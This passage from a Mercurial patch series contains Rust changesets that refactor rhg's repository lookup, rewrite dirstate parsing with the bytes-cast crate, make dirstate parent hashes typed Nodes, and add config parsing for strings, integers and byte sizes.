Differential Revision: https://phab.mercurial-scm.org/D10004 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -81,28 +81,6 @@ } } - /// Like `Repo::find`, but not finding a repository is not an error if no - /// explicit path is given. `Ok(None)` is returned in that case. - /// - /// If an explicit path *is* given, not finding a repository there is still - /// an error. - /// - /// For sub-commands that don’t need a repository, configuration should - /// still be affected by a repository’s `.hg/hgrc` file. This is the - /// constructor to use. - pub fn find_optional( - config: &Config, - explicit_path: Option<&Path>, - ) -> Result<Option<Self>, RepoError> { - match Self::find(config, explicit_path) { - Ok(repo) => Ok(Some(repo)), - Err(RepoError::NotFound { .. }) if explicit_path.is_none() => { - Ok(None) - } - Err(error) => Err(error), - } - } - /// To be called after checking that `.hg` is a sub-directory fn new_at_path( working_directory: PathBuf, diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,7 +1,6 @@ use crate::error::CommandError; use clap::Arg; use hg::operations::cat; -use hg::repo::Repo; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; use std::convert::TryFrom; @@ -39,7 +38,7 @@ None => vec![], }; - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -2,7 +2,6 @@ use clap::Arg; use format_bytes::format_bytes; use hg::errors::HgError; -use hg::repo::Repo; use hg::utils::SliceExt; pub const HELP_TEXT: &str = " @@ -22,13 +21,6 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), 
CommandError> { - let opt_repo = - Repo::find_optional(invocation.non_repo_config, invocation.repo_path)?; - let config = if let Some(repo) = &opt_repo { - repo.config() - } else { - invocation.non_repo_config - }; let (section, name) = invocation .subcommand_args .value_of("name") @@ -37,7 +29,7 @@ .split_2(b'.') .ok_or_else(|| HgError::abort(""))?; - let value = config.get(section, name).unwrap_or(b""); + let value = invocation.config().get(section, name).unwrap_or(b""); invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) diff --git a/rust/rhg/src/commands/debugdata.rs b/rust/rhg/src/commands/debugdata.rs --- a/rust/rhg/src/commands/debugdata.rs +++ b/rust/rhg/src/commands/debugdata.rs @@ -2,7 +2,6 @@ use clap::Arg; use clap::ArgGroup; use hg::operations::{debug_data, DebugDataKind}; -use hg::repo::Repo; use micro_timer::timed; pub const HELP_TEXT: &str = " @@ -55,8 +54,8 @@ } }; - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; - let data = debug_data(&repo, rev, kind).map_err(|e| (e, rev))?; + let repo = invocation.repo?; + let data = debug_data(repo, rev, kind).map_err(|e| (e, rev))?; let mut stdout = invocation.ui.stdout_buffer(); stdout.write_all(&data)?; diff --git a/rust/rhg/src/commands/debugrequirements.rs b/rust/rhg/src/commands/debugrequirements.rs --- a/rust/rhg/src/commands/debugrequirements.rs +++ b/rust/rhg/src/commands/debugrequirements.rs @@ -1,5 +1,4 @@ use crate::error::CommandError; -use hg::repo::Repo; pub const HELP_TEXT: &str = " Print the current repo requirements. 
@@ -10,7 +9,7 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; let mut output = String::new(); let mut requirements: Vec<_> = repo.requirements().iter().collect(); requirements.sort(); diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -29,15 +29,14 @@ pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { let rev = invocation.subcommand_args.value_of("rev"); - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; if let Some(rev) = rev { - let files = - list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; - display_files(invocation.ui, &repo, files.iter()) + let files = list_rev_tracked_files(repo, rev).map_err(|e| (e, rev))?; + display_files(invocation.ui, repo, files.iter()) } else { - let distate = Dirstate::new(&repo)?; + let distate = Dirstate::new(repo)?; let files = distate.tracked_files()?; - display_files(invocation.ui, &repo, files) + display_files(invocation.ui, repo, files) } } diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,6 +1,5 @@ use crate::error::CommandError; use format_bytes::format_bytes; -use hg::repo::Repo; use hg::utils::files::get_bytes_from_path; pub const HELP_TEXT: &str = " @@ -14,7 +13,7 @@ } pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { - let repo = Repo::find(invocation.non_repo_config, invocation.repo_path)?; + let repo = invocation.repo?; let bytes = get_bytes_from_path(repo.working_directory_path()); invocation .ui diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,5 +1,6 @@ use crate::ui::utf8_to_local; use 
crate::ui::UiError; +use crate::NoRepoInCwdError; use format_bytes::format_bytes; use hg::config::{ConfigError, ConfigParseError}; use hg::errors::HgError; @@ -64,7 +65,7 @@ match error { RepoError::NotFound { at } => CommandError::Abort { message: format_bytes!( - b"no repository found in '{}' (.hg not found)!", + b"repository {} not found", get_bytes_from_path(at) ), }, @@ -74,6 +75,18 @@ } } +impl<'a> From<&'a NoRepoInCwdError> for CommandError { + fn from(error: &'a NoRepoInCwdError) -> Self { + let NoRepoInCwdError { cwd } = error; + CommandError::Abort { + message: format_bytes!( + b"no repository found in '{}' (.hg not found)!", + get_bytes_from_path(cwd) + ), + } + } +} + impl From<ConfigError> for CommandError { fn from(error: ConfigError) -> Self { match error { diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -6,7 +6,8 @@ use clap::ArgMatches; use format_bytes::format_bytes; use hg::config::Config; -use std::path::Path; +use hg::repo::{Repo, RepoError}; +use std::path::{Path, PathBuf}; mod error; mod exitcode; @@ -74,17 +75,25 @@ let non_repo_config = &hg::config::Config::load(config_args)?; let repo_path = value_of_global_arg("repository").map(Path::new); + let repo = match Repo::find(non_repo_config, repo_path) { + Ok(repo) => Ok(repo), + Err(RepoError::NotFound { at }) if repo_path.is_none() => { + // Not finding a repo is not fatal yet, if `-R` was not given + Err(NoRepoInCwdError { cwd: at }) + } + Err(error) => return Err(error.into()), + }; run(&CliInvocation { ui, subcommand_args, non_repo_config, - repo_path, + repo: repo.as_ref(), }) } fn main() { - let ui = Ui::new(); + let ui = ui::Ui::new(); let exit_code = match main_with_result(&ui) { Ok(()) => exitcode::OK, @@ -146,5 +155,22 @@ ui: &'a Ui, subcommand_args: &'a ArgMatches<'a>, non_repo_config: &'a Config, - repo_path: Option<&'a Path>, + /// References inside `Result` is a bit peculiar but allow + /// `invocation.repo?` to 
work out with `&CliInvocation` since this + /// `Result` type is `Copy`. + repo: Result<&'a Repo, &'a NoRepoInCwdError>, +} + +struct NoRepoInCwdError { + cwd: PathBuf, } + +impl CliInvocation<'_> { + fn config(&self) -> &Config { + if let Ok(repo) = self.repo { + repo.config() + } else { + self.non_repo_config + } + } +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613560016 -3600 # Wed Feb 17 12:06:56 2021 +0100 # Node ID f88e8ae0aa8fcde5249c0f902f719ce12a36ebaf # Parent 5ce2aa7c2ad50a996a1b1657754f2ba89c799fa9 rust: Rewrite dirstate parsing usin the `bytes-cast` crate Differential Revision: https://phab.mercurial-scm.org/D10005 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -310,7 +310,6 @@ "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)", "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -15,7 +15,6 @@ home = "0.5" im-rc = "15.0.*" lazy_static = "1.4.0" -memchr = "2.3.3" rand = "0.7.3" rand_pcg = "0.2.1" rand_distr = "0.2.2" diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -7,6 +7,7 @@ use crate::errors::HgError; use crate::{utils::hg_path::HgPathBuf, FastHashMap}; +use bytes_cast::{unaligned, BytesCast}; use std::collections::hash_map; use std::convert::TryFrom; @@ -17,7 +18,8 @@ pub mod parsers; pub mod status; -#[derive(Debug, PartialEq, Clone)] 
+#[derive(Debug, PartialEq, Clone, BytesCast)] +#[repr(C)] pub struct DirstateParents { pub p1: [u8; 20], pub p2: [u8; 20], @@ -34,6 +36,16 @@ pub size: i32, } +#[derive(BytesCast)] +#[repr(C)] +struct RawEntry { + state: u8, + mode: unaligned::I32Be, + size: unaligned::I32Be, + mtime: unaligned::I32Be, + length: unaligned::I32Be, +} + /// A `DirstateEntry` with a size of `-2` means that it was merged from the /// other parent. This allows revert to pick the right status back during a /// merge. diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -386,10 +386,10 @@ } #[timed] - pub fn read( + pub fn read<'a>( &mut self, - file_contents: &[u8], - ) -> Result<Option<DirstateParents>, DirstateError> { + file_contents: &'a [u8], + ) -> Result<Option<&'a DirstateParents>, DirstateError> { if file_contents.is_empty() { return Ok(None); } diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -6,13 +6,13 @@ use crate::errors::HgError; use crate::utils::hg_path::HgPath; use crate::{ - dirstate::{CopyMap, EntryState, StateMap}, + dirstate::{CopyMap, EntryState, RawEntry, StateMap}, DirstateEntry, DirstateParents, }; -use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt}; +use byteorder::{BigEndian, WriteBytesExt}; +use bytes_cast::BytesCast; use micro_timer::timed; use std::convert::{TryFrom, TryInto}; -use std::io::Cursor; use std::time::Duration; /// Parents are stored in the dirstate as byte hashes. 
@@ -21,65 +21,45 @@ const MIN_ENTRY_SIZE: usize = 17; type ParseResult<'a> = ( - DirstateParents, + &'a DirstateParents, Vec<(&'a HgPath, DirstateEntry)>, Vec<(&'a HgPath, &'a HgPath)>, ); #[timed] -pub fn parse_dirstate(contents: &[u8]) -> Result<ParseResult, HgError> { - if contents.len() < PARENT_SIZE * 2 { - return Err(HgError::corrupted("Too little data for dirstate.")); - } - let mut copies = vec![]; - let mut entries = vec![]; +pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> { + let mut copies = Vec::new(); + let mut entries = Vec::new(); - let mut curr_pos = PARENT_SIZE * 2; - let parents = DirstateParents { - p1: contents[..PARENT_SIZE].try_into().unwrap(), - p2: contents[PARENT_SIZE..curr_pos].try_into().unwrap(), - }; + let (parents, rest) = DirstateParents::from_bytes(contents) + .map_err(|_| HgError::corrupted("Too little data for dirstate."))?; + contents = rest; + while !contents.is_empty() { + let (raw_entry, rest) = RawEntry::from_bytes(contents) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - while curr_pos < contents.len() { - if curr_pos + MIN_ENTRY_SIZE > contents.len() { - return Err(HgError::corrupted("Overflow in dirstate.")); - } - let entry_bytes = &contents[curr_pos..]; + let entry = DirstateEntry { + state: EntryState::try_from(raw_entry.state)?, + mode: raw_entry.mode.get(), + mtime: raw_entry.mtime.get(), + size: raw_entry.size.get(), + }; + let (paths, rest) = + u8::slice_from_bytes(rest, raw_entry.length.get() as usize) + .map_err(|_| HgError::corrupted("Overflow in dirstate."))?; - let mut cursor = Cursor::new(entry_bytes); - // Unwraping errors from `byteorder` as we’ve already checked - // `MIN_ENTRY_SIZE` so the input should never be too short. 
- let state = EntryState::try_from(cursor.read_u8().unwrap())?; - let mode = cursor.read_i32::<BigEndian>().unwrap(); - let size = cursor.read_i32::<BigEndian>().unwrap(); - let mtime = cursor.read_i32::<BigEndian>().unwrap(); - let path_len = cursor.read_i32::<BigEndian>().unwrap() as usize; - - if path_len > contents.len() - curr_pos { - return Err(HgError::corrupted("Overflow in dirstate.")); + // `paths` is either a single path, or two paths separated by a NULL + // byte + let mut iter = paths.splitn(2, |&byte| byte == b'\0'); + let path = HgPath::new( + iter.next().expect("splitn always yields at least one item"), + ); + if let Some(copy_source) = iter.next() { + copies.push((path, HgPath::new(copy_source))); } - // Slice instead of allocating a Vec needed for `read_exact` - let path = &entry_bytes[MIN_ENTRY_SIZE..MIN_ENTRY_SIZE + (path_len)]; - - let (path, copy) = match memchr::memchr(0, path) { - None => (path, None), - Some(i) => (&path[..i], Some(&path[(i + 1)..])), - }; - - if let Some(copy_path) = copy { - copies.push((HgPath::new(path), HgPath::new(copy_path))); - }; - entries.push(( - HgPath::new(path), - DirstateEntry { - state, - mode, - size, - mtime, - }, - )); - curr_pos = curr_pos + MIN_ENTRY_SIZE + (path_len); + entries.push((path, entry)); + contents = rest; } Ok((parents, entries, copies)) } @@ -374,7 +354,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -452,7 +432,7 @@ .collect(); assert_eq!( - (parents, state_map, copymap), + (&parents, state_map, copymap), (new_parents, new_state_map, new_copy_map) ) } @@ -499,7 +479,7 @@ assert_eq!( ( - parents, + &parents, [( HgPathBuf::from_bytes(b"f1"), DirstateEntry { # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613561093 -3600 # Wed Feb 17 12:24:53 2021 +0100 # Node ID 98a455a62699ace0b2c743a8d3e4fa74f1a2f28e # Parent f88e8ae0aa8fcde5249c0f902f719ce12a36ebaf rust: Make 
`DirstateParents`’s fields typed `Node`s Instead of plain byte arrays. Differential Revision: https://phab.mercurial-scm.org/D10006 diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -6,6 +6,7 @@ // GNU General Public License version 2 or any later version. use crate::errors::HgError; +use crate::revlog::Node; use crate::{utils::hg_path::HgPathBuf, FastHashMap}; use bytes_cast::{unaligned, BytesCast}; use std::collections::hash_map; @@ -21,8 +22,8 @@ #[derive(Debug, PartialEq, Clone, BytesCast)] #[repr(C)] pub struct DirstateParents { - pub p1: [u8; 20], - pub p2: [u8; 20], + pub p1: Node, + pub p2: Node, } /// The C implementation uses all signed types. This will be an issue diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -6,7 +6,7 @@ // GNU General Public License version 2 or any later version. 
use crate::errors::HgError; -use crate::revlog::node::NULL_NODE_ID; +use crate::revlog::node::NULL_NODE; use crate::{ dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT}, pack_dirstate, parse_dirstate, @@ -73,8 +73,8 @@ self.non_normal_set = None; self.other_parent_set = None; self.set_parents(&DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }) } @@ -367,8 +367,8 @@ }; } else if file_contents.is_empty() { parents = DirstateParents { - p1: NULL_NODE_ID, - p2: NULL_NODE_ID, + p1: NULL_NODE, + p2: NULL_NODE, }; } else { return Err( diff --git a/rust/hg-core/src/dirstate/parsers.rs b/rust/hg-core/src/dirstate/parsers.rs --- a/rust/hg-core/src/dirstate/parsers.rs +++ b/rust/hg-core/src/dirstate/parsers.rs @@ -89,8 +89,8 @@ let mut packed = Vec::with_capacity(expected_size); - packed.extend(&parents.p1); - packed.extend(&parents.p2); + packed.extend(parents.p1.as_bytes()); + packed.extend(parents.p2.as_bytes()); for (filename, entry) in state_map.iter_mut() { let new_filename = filename.to_owned(); @@ -223,8 +223,8 @@ let mut state_map = StateMap::default(); let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = b"1234567891011121314100000000000000000000".to_vec(); @@ -254,8 +254,8 @@ let copymap = FastHashMap::default(); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let expected = [ @@ -294,8 +294,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = 
Duration::new(15000000, 0); let expected = [ @@ -334,8 +334,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -412,8 +412,8 @@ HgPathBuf::from_bytes(b"copyname2"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = @@ -458,8 +458,8 @@ HgPathBuf::from_bytes(b"copyname"), ); let parents = DirstateParents { - p1: *b"12345678910111213141", - p2: *b"00000000000000000000", + p1: b"12345678910111213141".into(), + p2: b"00000000000000000000".into(), }; let now = Duration::new(15000000, 0); let result = diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -85,6 +85,13 @@ } } +impl From<&'_ NodeData> for Node { + #[inline] + fn from(data: &'_ NodeData) -> Self { + Self { data: *data } + } +} + impl fmt::LowerHex for Node { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { for &byte in &self.data { diff --git a/rust/hg-cpython/src/dirstate/dirstate_map.rs b/rust/hg-cpython/src/dirstate/dirstate_map.rs --- a/rust/hg-cpython/src/dirstate/dirstate_map.rs +++ b/rust/hg-cpython/src/dirstate/dirstate_map.rs @@ -24,12 +24,14 @@ NonNormalEntries, NonNormalEntriesIterator, }, dirstate::{dirs_multiset::Dirs, make_dirstate_tuple}, + parsers::dirstate_parents_to_pytuple, }; use hg::{ errors::HgError, + revlog::Node, utils::hg_path::{HgPath, HgPathBuf}, DirsMultiset, DirstateEntry, DirstateMap as RustDirstateMap, - DirstateMapError, DirstateParents, EntryState, StateMapIter, PARENT_SIZE, + DirstateMapError, DirstateParents, EntryState, StateMapIter, }; // TODO @@ -285,10 +287,7 @@ def 
parents(&self, st: PyObject) -> PyResult<PyTuple> { self.inner(py).borrow_mut() .parents(st.extract::<PyBytes>(py)?.data(py)) - .and_then(|d| { - Ok((PyBytes::new(py, &d.p1), PyBytes::new(py, &d.p2)) - .to_py_object(py)) - }) + .map(|parents| dirstate_parents_to_pytuple(py, parents)) .or_else(|_| { Err(PyErr::new::<exc::OSError, _>( py, @@ -311,9 +310,8 @@ .read(st.extract::<PyBytes>(py)?.data(py)) { Ok(Some(parents)) => Ok(Some( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py) - .into_object(), + dirstate_parents_to_pytuple(py, parents) + .into_object() )), Ok(None) => Ok(Some(py.None())), Err(_) => Err(PyErr::new::<exc::OSError, _>( @@ -601,7 +599,7 @@ Option<(PyBytes, PyObject)> ); -fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<[u8; PARENT_SIZE]> { +fn extract_node_id(py: Python, obj: &PyObject) -> PyResult<Node> { let bytes = obj.extract::<PyBytes>(py)?; match bytes.data(py).try_into() { Ok(s) => Ok(s), diff --git a/rust/hg-cpython/src/parsers.rs b/rust/hg-cpython/src/parsers.rs --- a/rust/hg-cpython/src/parsers.rs +++ b/rust/hg-cpython/src/parsers.rs @@ -53,10 +53,7 @@ PyBytes::new(py, copy_path.as_bytes()), )?; } - Ok( - (PyBytes::new(py, &parents.p1), PyBytes::new(py, &parents.p2)) - .to_py_object(py), - ) + Ok(dirstate_parents_to_pytuple(py, parents)) } Err(e) => Err(PyErr::new::<exc::ValueError, _>(py, e.to_string())), } @@ -155,3 +152,12 @@ Ok(m) } + +pub(crate) fn dirstate_parents_to_pytuple( + py: Python, + parents: &DirstateParents, +) -> PyTuple { + let p1 = PyBytes::new(py, parents.p1.as_bytes()); + let p2 = PyBytes::new(py, parents.p2.as_bytes()); + (p1, p2).to_py_object(py) +} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613557294 -3600 # Wed Feb 17 11:21:34 2021 +0100 # Node ID d2e61f00ee9dd3933ab6ec737ac927dd4085d7b2 # Parent 98a455a62699ace0b2c743a8d3e4fa74f1a2f28e rust: Introduce a get_bytes_from_os_str utility function It does the same as get_bytes_from_path but 
takes an `OsStr` instead of a `Path`. The implementation is the same so using either ends up correct but the function name suggests it’s not. Differential Revision: https://phab.mercurial-scm.org/D10007 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -11,7 +11,7 @@ use crate::config::layer::{ ConfigError, ConfigLayer, ConfigParseError, ConfigValue, }; -use crate::utils::files::get_bytes_from_path; +use crate::utils::files::get_bytes_from_os_str; use format_bytes::{write_bytes, DisplayBytes}; use std::env; use std::path::{Path, PathBuf}; @@ -134,8 +134,7 @@ layer.add( section.to_owned(), key.to_owned(), - // `value` is not a path but this works for any `OsStr`: - get_bytes_from_path(value), + get_bytes_from_os_str(value), None, ); self.layers.push(layer) diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -17,6 +17,7 @@ use lazy_static::lazy_static; use same_file::is_same_file; use std::borrow::{Cow, ToOwned}; +use std::ffi::OsStr; use std::fs::Metadata; use std::iter::FusedIterator; use std::ops::Deref; @@ -40,8 +41,13 @@ // that's why Vec<u8> is returned. #[cfg(unix)] pub fn get_bytes_from_path(path: impl AsRef<Path>) -> Vec<u8> { + get_bytes_from_os_str(path.as_ref()) +} + +#[cfg(unix)] +pub fn get_bytes_from_os_str(str: impl AsRef<OsStr>) -> Vec<u8> { use std::os::unix::ffi::OsStrExt; - path.as_ref().as_os_str().as_bytes().to_vec() + str.as_ref().as_bytes().to_vec() } /// An iterator over repository path yielding itself and its ancestors. 
diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -70,8 +70,7 @@ }; let config_args = values_of_global_arg("config") - // `get_bytes_from_path` works for OsStr the same as for Path - .map(hg::utils::files::get_bytes_from_path); + .map(hg::utils::files::get_bytes_from_os_str); let non_repo_config = &hg::config::Config::load(config_args)?; let repo_path = value_of_global_arg("repository").map(Path::new); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613480131 -3600 # Tue Feb 16 13:55:31 2021 +0100 # Node ID 305d74c262ded61002bb02a9cdd740918be31d95 # Parent d2e61f00ee9dd3933ab6ec737ac927dd4085d7b2 rust: Add config parsing support for more value types * Rust `str` (ASCII or UTF-8) * Integer * Byte quantities Differential Revision: https://phab.mercurial-scm.org/D10008 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -15,6 +15,7 @@ use format_bytes::{write_bytes, DisplayBytes}; use std::env; use std::path::{Path, PathBuf}; +use std::str; use crate::errors::{HgResultExt, IoResultExt}; @@ -61,6 +62,32 @@ } } +pub fn parse_byte_size(value: &[u8]) -> Option<u64> { + let value = str::from_utf8(value).ok()?.to_ascii_lowercase(); + const UNITS: &[(&str, u64)] = &[ + ("g", 1 << 30), + ("gb", 1 << 30), + ("m", 1 << 20), + ("mb", 1 << 20), + ("k", 1 << 10), + ("kb", 1 << 10), + ("b", 1 << 0), // Needs to be last + ]; + for &(unit, multiplier) in UNITS { + // TODO: use `value.strip_suffix(unit)` when we require Rust 1.45+ + if value.ends_with(unit) { + let value_before_unit = &value[..value.len() - unit.len()]; + let float: f64 = value_before_unit.trim().parse().ok()?; + if float >= 0.0 { + return Some((float * multiplier as f64).round() as u64); + } else { + return None; + } + } + } + value.parse().ok() +} + impl Config { /// Load system and user configuration from various 
files. /// @@ -231,16 +258,14 @@ Ok(repo_config) } - /// Returns an `Err` if the first value found is not a valid boolean. - /// Otherwise, returns an `Ok(option)`, where `option` is the boolean if - /// found, or `None`. - pub fn get_option( - &self, + fn get_parse<'config, T: 'config>( + &'config self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigParseError> { + parse: impl Fn(&'config [u8]) -> Option<T>, + ) -> Result<Option<T>, ConfigParseError> { match self.get_inner(§ion, &item) { - Some((layer, v)) => match parse_bool(&v.bytes) { + Some((layer, v)) => match parse(&v.bytes) { Some(b) => Ok(Some(b)), None => Err(ConfigParseError { origin: layer.origin.to_owned(), @@ -252,6 +277,50 @@ } } + /// Returns an `Err` if the first value found is not a valid UTF-8 string. + /// Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_str( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<&str>, ConfigParseError> { + self.get_parse(section, item, |value| str::from_utf8(value).ok()) + } + + /// Returns an `Err` if the first value found is not a valid unsigned + /// integer. Otherwise, returns an `Ok(value)` if found, or `None`. + pub fn get_u32( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u32>, ConfigParseError> { + self.get_parse(section, item, |value| { + str::from_utf8(value).ok()?.parse().ok() + }) + } + + /// Returns an `Err` if the first value found is not a valid file size + /// value such as `30` (default unit is bytes), `7 MB`, or `42.5 kb`. + /// Otherwise, returns an `Ok(value_in_bytes)` if found, or `None`. + pub fn get_byte_size( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<u64>, ConfigParseError> { + self.get_parse(section, item, parse_byte_size) + } + + /// Returns an `Err` if the first value found is not a valid boolean. + /// Otherwise, returns an `Ok(option)`, where `option` is the boolean if + /// found, or `None`. 
+ pub fn get_option( + &self, + section: &[u8], + item: &[u8], + ) -> Result<Option<bool>, ConfigParseError> { + self.get_parse(section, item, parse_bool) + } + /// Returns the corresponding boolean in the config. Returns `Ok(false)` /// if the value is not found, an `Err` if it's not a valid boolean. pub fn get_bool( @@ -317,7 +386,8 @@ let base_config_path = tmpdir_path.join("base.rc"); let mut config_file = File::create(&base_config_path).unwrap(); let data = - b"[section]\nitem=value0\n%include included.rc\nitem=value2"; + b"[section]\nitem=value0\n%include included.rc\nitem=value2\n\ + [section2]\ncount = 4\nsize = 1.5 KB\nnot-count = 1.5\nnot-size = 1 ub"; config_file.write_all(data).unwrap(); let sources = vec![ConfigSource::AbsPath(base_config_path)]; @@ -339,5 +409,13 @@ config.get_all(b"section", b"item"), [b"value2", b"value1", b"value0"] ); + + assert_eq!(config.get_u32(b"section2", b"count").unwrap(), Some(4)); + assert_eq!( + config.get_byte_size(b"section2", b"size").unwrap(), + Some(1024 + 512) + ); + assert!(config.get_u32(b"section2", b"not-count").is_err()); + assert!(config.get_byte_size(b"section2", b"not-size").is_err()); } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1613485340 -3600 # Tue Feb 16 15:22:20 2021 +0100 # Node ID bc08c2331f996e5da6cb0adf5e18c08246511db2 # Parent 305d74c262ded61002bb02a9cdd740918be31d95 rust: Add a `ConfigValueParseError` variant to common errors Configuration files are parsed into sections of key/value pairs when they are read, but at that point values are still arbitrary bytes. Only when a value is accessed by various parts of the code do we know its expected type and syntax, so values are parsed at that point. Let’s make a new error type for this latter kind of parsing error, and add a variant to the common `HgError` so that most code can propagate it without much boilerplate. 
